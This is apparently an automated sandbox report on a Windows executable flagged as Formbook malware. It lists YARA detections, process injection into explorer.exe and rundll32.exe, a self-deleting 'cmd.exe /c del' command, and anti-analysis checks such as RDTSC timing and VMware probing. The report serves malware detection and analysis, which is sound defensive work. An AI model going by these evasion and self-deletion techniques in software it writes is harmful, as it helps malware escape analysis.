          Source: NdBLyH2h5d.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/11
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE791.tmpJump to behavior
          Source: NdBLyH2h5d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: NdBLyH2h5d.exeVirustotal: Detection: 20%
          Source: NdBLyH2h5d.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\user\Desktop\NdBLyH2h5d.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeUnpacked PE file: 1.2.NdBLyH2h5d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: 6oxdti6l9qd.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C8CC push es; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041925A push esp; retf
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A5D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C8CC push es; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041925A push esp; retf
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B45C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0465D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB925A push esp; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB3FB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC8CC push es; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB45C push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dllJump to dropped file
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002BA85E4 second address: 0000000002BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002BA896E second address: 0000000002BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6540Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.228623277.00000000056A1000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.233670194.0000000008907000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.233210221.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.492571726.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.233471521.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.228573395.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_02631868 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_02631650 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]
